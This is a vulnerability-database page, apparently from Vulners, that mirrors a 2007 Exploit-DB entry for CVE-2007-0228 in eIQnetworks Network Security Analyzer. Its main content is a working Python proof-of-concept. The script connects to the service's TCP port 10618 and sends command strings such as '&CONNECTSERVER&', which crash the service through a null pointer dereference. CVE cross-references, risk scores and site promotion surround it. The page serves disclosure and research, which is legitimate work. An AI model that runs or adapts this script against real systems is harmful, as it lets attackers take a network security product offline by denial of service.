Lucene search
+L

eIQnetworks Network Security Analyzer - Null Pointer Dereference

🗓️ 10 Jan 2007 00:00:00Reported by Ethan HuntType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

Network Security Analyzer Null Pointer Dereference in Pytho

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-0228
13 Jan 200702:00
cve
cvelist
Cvelist
CVE-2007-0228
13 Jan 200702:00
cvelist
euvd
EUVD
EUVD-2007-0230
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-0228
13 Jan 200702:28
nvd
prion
Prion
Null pointer dereference
13 Jan 200702:28
prion
securityvulns
securityvulns
EIQ Networks Network Security Analyzer DoS
11 Jan 200700:00
securityvulns
#!c:\python\python.exe
# uncomment whichever function youd like. theyll all crash in a similar way.

# Any of the following "function names" will cause the service to throw an access violation
# while dereferencing the return value from a call to FindIndex
# ( http://msdn2.microsoft.com/de-de/library/a93550bb(VS.80).aspx):

# Ethan Hunt <m34r\[@\]hackermail.com>

import socket

s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
s.connect(('192.168.1.101', 10618))

print "[*] connected"

s.send("&CONNECTSERVER&")
#s.send("&ADDENTRY&")
#s.send("&FIN&")
#s.send("&START&")
#s.send("&LOGPATH&")
#s.send("&FWADELTA&")
#s.send("&FWALOG&")
#s.send("&SETSYNCHRONOUS&")
#s.send("&SETPRGFILE&")
#s.send("&SETREPLYPORT&")

print "disconnecting."

s.close()

# milw0rm.com [2007-01-10]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.07337
41